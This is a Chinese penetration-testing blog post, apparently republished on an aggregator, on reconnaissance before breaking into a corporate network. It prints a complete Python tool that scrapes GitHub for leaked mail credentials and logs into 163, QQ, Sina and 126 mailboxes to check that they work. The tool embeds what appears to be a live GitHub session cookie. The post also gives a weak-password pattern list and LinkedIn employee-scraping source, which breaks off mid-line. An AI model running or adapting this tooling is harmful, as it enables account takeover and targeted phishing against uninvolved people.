内网渗透系列:信息搜集方法小结2

Posted 思源湖的鱼

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了内网渗透系列:信息搜集方法小结2相关的知识,希望对你有一定的参考价值。

前言

之前已经小结过一些方法:

本文与前两者相互补充,主要还是小结下尝试进入内网时(即还是更偏向于前渗透)的一些信息搜集方法

一、开源情报(OSINT)

1、whois/反查/相关资产

2、github敏感信息

(1)github邮箱密码爬取

爬取github上的邮箱密码,并验证,基于Python2
用法:python Nuggests.py 100 (100为页数最大一百页)

Mail_Modules.py

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import smtplib
"""支持126,qq,sina,163邮箱"""
def maillogin_163(username,password,url):
    smtp_host = "smtp.163.com"
    smtp_port = "25"
    smtp_user = username
    smtp_pass = password
    try:
        smtp = smtplib.SMTP()
        smtp.connect(smtp_host,smtp_port)
        smtp.login(smtp_user,smtp_pass)
        print 'Analysis :' + url
        print 'Loading 163mail Module'
        print smtp_user+':'+smtp_pass+'  Login OK!'
    except Exception:
        pass
def maillogin_qq(username,password,url):
    smtp_host = "smtp.qq.com"
    smtp_port = "25"
    smtp_user = username
    smtp_pass = password
    try:
        smtp = smtplib.SMTP()
        smtp.connect(smtp_host,smtp_port)
        smtp.login(smtp_user,smtp_pass)
        print 'Analysis :' + url
        print 'Loading qq mail Module'
        print smtp_user+':'+smtp_pass+'  Login OK!'
    except Exception:
        pass
def maillogin_sina(username,password,url):
    smtp_host = "smtp.sina.com"
    smtp_port = "25"
    smtp_user = username
    smtp_pass = password
    try:
        smtp = smtplib.SMTP()
        smtp.connect(smtp_host,smtp_port)
        smtp.login(smtp_user,smtp_pass)
        print 'Analysis :' + url
        print 'Loading Sina mail Module'
        print smtp_user+':'+smtp_pass+'  Login OK!'
    except Exception:
        pass
def maillogin_126(username,password,url):
    smtp_host = "smtp.126.com"
    smtp_port = "25"
    smtp_user = username
    smtp_pass = password
    try:
        smtp = smtplib.SMTP()
        smtp.connect(smtp_host,smtp_port)
        smtp.login(smtp_user,smtp_pass)
        print 'Analysis :' + url
        print 'Loading 126 mail Module'
        print smtp_user+':'+smtp_pass+'  Login OK!'
    except Exception:
        pass

Nuggests.py

#!/usr/bin/env python 
# -*- coding: utf-8 -*-

import requests,sys
from bs4 import BeautifulSoup
from Mail_Modules import maillogin_163,maillogin_qq,maillogin_sina,maillogin_126
global urllist
urllist = []

def mailfilter(list,mod):
    usern = ''
    password =''
    for url in list:
        try:
            page = requests.get(url).content

            page = page.split()

            for index in range(len(page)):
                if 'user' in page[index]:
                    usern = page[index+2].strip(',').replace("'","")
                #print user
                if 'pass' in page[index]:
                    password = page[index+2].strip(',').replace("'","")
                #print password
        except:
            pass
        if mod == '163':
            maillogin_163(usern,password,url)
        if mod == 'qq':
            maillogin_qq(usern,password,url)
        if mod == 'sina':
            maillogin_sina(usern,password,url)
        if mod == '126':
            maillogin_126(usern,password,url)

def read_page(keyword,pages):
    pages = int(pages)
    print 'Search Keyword : '+keyword
    print 'Scanning '+str(pages)+' pages from Github!'
    for page in range(pages):
        headers = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (Khtml, like Gecko) Chrome/49.0.2623.75 Safari/537.36 115Browser/7.2.5'
        cookie = {"Cookie":"_octo=GH1.1.1911767667.1480641870; logged_in=yes; dotcom_user=menu88; _ga=GA1.2.1291948085.1480641870; tz=Asia%2FShanghai; _gh_sess=eyJzZXNzaW9uX2lkIjoiNWY4YTVkMTk3YzRhNzg3ZWEwYjM5OWUwZWNhNDY2ZWIiLCJjb250ZXh0IjoiLyIsInNweV9yZXBvIjoibWVudTg4L215cHVibGljIiwic3B5X3JlcG9fYXQiOjE0ODEyNDY5NDN9--170066295059ff1fc3d8b46b50d3c62847ac82eb; user_session=JA153nFX9QfOaFbu2vCdVLPuU_9_K9NvEO4mvMqZ4NaK3TjX; __Host-user_session_same_site=JA153nFX9QfOaFbu2vCdVLPuU_9_K9NvEO4mvMqZ4NaK3TjX"} #cookie换成自己github的
        url = 'https://github.com/search?l=php&p='+str(page)+'&q='+keyword+'&type=Code&utf8=%E2%9C%93'
        print '正在抓取第'+str(page)+'页!'
        pagecon = requests.get(url,cookies = cookie).content
        soup = BeautifulSoup(pagecon,"html.parser")
        for link in soup.find_all('a'):
            url = link.get('href')
            if 'blob' in url:
                url = url.split('#')[0]
                url = url.split('blob/')[0]+url.split('blob/')[1]
                urllist.append('https://raw.githubusercontent.com'+url)
pages = 5
#pages = sys.argv[1]
read_page('smtp+163.com',pages)
urllist = list(set(urllist))
mailfilter(urllist,'163')
urllist =[]
read_page('smtp+qq.com',pages)
urllist = list(set(urllist))
mailfilter(urllist,'qq')
urllist =[]
read_page('smtp+sina.com',pages)
urllist = list(set(urllist))
mailfilter(urllist,'sina')
urllist =[]
read_page('smtp+126.com',pages)
urllist = list(set(urllist))
mailfilter(urllist,'126')

(2)GSIL

止介大佬写的:https://github.com/FeeiCN/GSIL
近实时(15min)监控GitHub敏感信息泄露,并发送告警通知,基于Python3

(3)x-patrol

小米安全的:https://github.com/MiSecurity/x-patrol

比起前两个更完善,基于Go

3、google hacking

可参见:Google Hack 方法小结

二、企业密码字典

1、字典列表

github上的一些字典:

针对特定的厂商

['%pwd%123','%user%123','%user%521','%user%2017','%pwd%321','%pwd%521','%user%321','%pwd%123!','%pwd%123!@#','%pwd%1234','%user%2016','%user%123$%^','%user%123!@#','%pwd%2016','%pwd%2017','%pwd%1!','%pwd%2@','%pwd%3#','%pwd%123#@!','%pwd%12345','%pwd%123$%^','%pwd%!@#456','%pwd%123qwe','%pwd%qwe123','%pwd%qwe','%pwd%123456','%user%123#@!','%user%!@#456','%user%1234','%user%12345','%user%123456','%user%123!']

2、密码生成

(1)genpAss

中国特色的弱口令生成器,可以根据个人信息生成弱口令
原作者删掉了,https://github.com/test98123456/genpAss

(2)passmaker

https://github.com/bit4woo/passmaker
根据定制的规则来组合生成出密码字典,主要目标是针对企业,基于Python2

(3)pydictor

https://github.com/LandGrey/pydictor
可以生成各种字典,功能强大

三、从公共数据源获取信息

1、Link

https://github.com/mdsecactivebreach/LinkedInt

用法:

Providing you with Linkedin Intelligence
Author: Vincent Yiu (@vysec, @vysecurity)
Original version by @DisK0nn3cT
[*] Enter search Keywords (use quotes for more percise results)
"General Motors"

[*] Enter filename for output (exclude file extension)
generalmotors

[*] Filter by Company? (Y/N):
Y

[*] Specify a Company ID (Provide ID or leave blank to automate):


[*] Enter e-mail domain suffix (eg. contoso.com):
gm.com

[*] Select a prefix for e-mail generation (auto,full,firstlast,firstmlast,flast,first.last,fmlast):
auto

[*] Automaticly using Hunter IO to determine best Prefix
[!] {first}.{last}
[+] Found first.last prefix

源码:

# LinkedInt
# Scrapes LinkedIn without using LinkedIn API
# Original scraper by @DisK0nn3cT (https://github.com/DisK0nn3cT/linkedin-gatherer)
# Modified by @vysecurity
# - Additions:
# --- UI Updates
# --- Constrain to company filters
# --- Addition of Hunter for e-mail prediction


#!/usr/bin/python

import socket
import sys
import re
import time
import requests
import subprocess
import json
import argparse
import smtplib
import dns.resolver
import cookielib
import os
import urllib
import math
import urllib2
import string
from bs4 import BeautifulSoup
from thready import threaded

reload(sys)
sys.setdefaultencoding('utf-8')

""" Setup Argument Parameters """
parser = argparse.ArgumentParser(description='Discovery LinkedIn')
parser.add_argument('-u', '--keywords', help='Keywords to search')
parser.add_argument('-o', '--output', help='Output file (do not include extentions)')
args = parser.parse_args()
api_key = "" # Hunter API key
username = "" 	# enter username here
password = ""	# enter password here

if api_key == "" or username == "" or password == "":
        print "[!] Oops, you did not enter your api_key, username, or password in LinkedInt.py"
        sys.exit(0)

def login():
	cookie_filename = "cookies.txt"
	cookiejar = cookielib.MozillaCookieJar(cookie_filename)
	opener = urllib2.build_opener(urllib2.HTTPRedirectHandler(),urllib2.HTTPHandler(debuglevel=0),urllib2.HTTPSHandler(debuglevel=0),urllib2.HTTPCookieProcessor(cookiejar))
	page = loadPage(opener, "https://www.linkedin.com/")
	parse = BeautifulSoup(page, "html.parser")

	csrf = parse.find(id="loginCsrfParam-login")['value']
	
	login_data = urllib.urlencode({'session_key': username, 'session_password': password, 'loginCsrfParam': csrf})
	page = loadPage(opener,"https://www.linkedin.com/uas/login-submit", login_data)
	
	parse = BeautifulSoup(page, "html.parser")
	cookie = ""
	
	try:
		cookie = cookiejar._cookies['.www.linkedin.com']['/']['li_at'].value
	except:
		sys.exit(0)
	
	cookiejar.save()
	os.remove(cookie_filename)
	return cookie

def loadPage(client, url, data=None):
	try:
		response = client.open(url)
	except:
		print "[!] Cannot load main LinkedIn page"
	try:
		if data is not None:
			response = client.open(url, data)
		else:
			response = client.open(url)
		return ''.join(response.readlines())
	except:
		sys.exit(0)

def get_search():

    body = ""
    csv = []
    css = """<style>
    #employees {
        font-family: "Trebuchet MS", Arial, Helvetica, sans-serif;
        border-collapse: collapse;
        width: 100%;
    }
    #employees td, #employees th {
        border: 1px solid #ddd;
        padding: 8px;
    }
    #employees tr:nth-child(even){background-color: #f2f2f2;}
    #employees tr:hover {background-color: #ddd;}
    #employees th {
        padding-top: 12px;
        padding-bottom: 12px;
        text-align: left;
        background-color: #4CAF50;
        color: white;
    }
    </style>
    """

    header = """<center><table id=\\"employees\\">
             <tr>
             <th>Photo</th>
             <th>Name</th>
             <th>Possible Email:</th>
             <th>Job</th>
             <th>Location</th>
             </tr>
             """

    # Do we want to automatically get the company ID?


    if bCompany:
	    if bAuto:
	        # Automatic
	        # Grab from the URL 
	        companyID = 0
	        url = "https://www.linkedin.com/voyager/api/typeahead/hits?q=blended&query=%s" % search
	        headers = {'Csrf-Token':'ajax:0397788525211216808', 'X-RestLi-Protocol-Version':'2.0.0'}
	        cookies['JSESSIONID'] = 'ajax:0397788525211216808'
	        r = requests.get(url, cookies=cookies, headers=headers)
	        content = json.loads(r.text)
	        firstID = 0
	        for i in range(0,len(content['elements'])):
	        	try:
	        		companyID = content['elements'][i]['hitInfo']['com.linkedin.voyager.typeahead.TypeaheadCompany']['id']
	        		if firstID == 0:
	        			firstID = companyID
	        		print "[Notice] Found company ID: %s" % companyID
	        	except:
	        		continue
	        companyID = firstID
	        if companyID == 0:
	        	print "[WARNING] No valid company ID found in auto, please restart and find your own"
	    else:
	        # Don't auto, use the specified ID
	        companyID = bSpecific

	    print
	    
	    print "[*] Using company ID: %s" % companyID

	# Fetch the initial page to get results/page counts
    if bCompany == False:
        url = "https://www.linkedin.com/voyager/api/search/cluster?count=40&guides=List()&keywords=%s&origin=OTHER&q=guided&start=0" % search
    else:
        url = "https://www.linkedin.com/voyager/api/search/cluster?count=40&guides=List(v->PEOPLE,facetCurrentCompany->%s)&origin=OTHER&q=guided&start=0" % (companyID)
    
    print url
    
    headers = {'Csrf-Token':'ajax:0397788525211216808', 'X-RestLi-Protocol-Version':'2.0.0'}
    cookies['JSESSIONID'] = 'ajax:0397788525211216808'
    #print url
    r = requests.get(url, cookies=cookies, headers=headers)
    content = json.loads(r.text)
    data_total = content['elements'][0]['total']

    # Calculate pages off final results at 40 results/page
    pages = data_total / 40

    if pages == 0:
    	pages = 1

    if data_total % 40 == 0:
        # Becuase we count 0... Subtract a page if there are no left over results on the last page
        pages = pages - 1 

    if pages == 0: 
    	print "[!] Try to use quotes in the search name"
    	sys.exit(0)
    
    print "[*] %i Results Found" % data_total
    if data_total > 1000:
        pages = 25
        print "[*] LinkedIn only allows 1000 results. Refine keywords to capture all data"
    print "[*] Fetching %i Pages" % pages
    print

    for p in range(pages):
        # Request results for each page using the start offset
        if bCompany == False:
            url = "https://www.linkedin.com/voyager/api/search/cluster?count=40&guides=List()&keywords=%s&origin=OTHER&q=guided&start=%i" % (search, p*40)
        else:
            url = "https://www.linkedin.com/voyager/api/search/cluster?count=40&guides=List(v->PEOPLE,facetCurrentCompany->%s)&origin=OTHER&q=guided&start=%i" % (companyID, p*40)
        #print url
        r = requests.get(url, cookies=cookies, headers=headers)
        content = r.text.encode('UTF-8')
        content = json.loads(content)
        print "[*] Fetching page %i with %i results" % ((p),len(content['elements'][0]['elements']))
        for c in content['elements'][0]['elements']:
            if 'com.linkedin.voyager.search.SearchProfile' in c['hitInfo'] and c['hitInfo']['com.linkedin.voyager.search.SearchProfile']['headless'] == False:
                try:
                    data_industry = c['hitInfo']['com.linkedin.voyager.search.SearchProfile']['industry']
                except:
                    data_industry = ""    
                data_firstname = c['hitInfo']['com.linkedin.voyager.search.SearchProfile']['miniProfile']['firstName']
                data_lastname = c['hitInfo']['com.linkedin.voyager.search.SearchProfile']['miniProfile']['lastName']
                data_slug = "https://www.linkedin.com/in/%s" % c['hitInfo']['com.linkedin.voyager.search.SearchProfile']['miniProfile']['publicIdentifier']
                data_occupation = c['hitInfo']['com.linkedin.voyager.search.SearchProfile']['miniProfile']['occupation']
                data_location 以上是关于内网渗透系列:信息搜集方法小结2的主要内容,如果未能解决你的问题,请参考以下文章

内网渗透系列:内网信息搜集方法小结

内网渗透系列:信息搜集方法小结2

内网渗透系列:信息搜集方法小结2

内网渗透系列:横向渗透方法小结

内网渗透系列:横向渗透方法小结

内网渗透系列:痕迹清理方法小结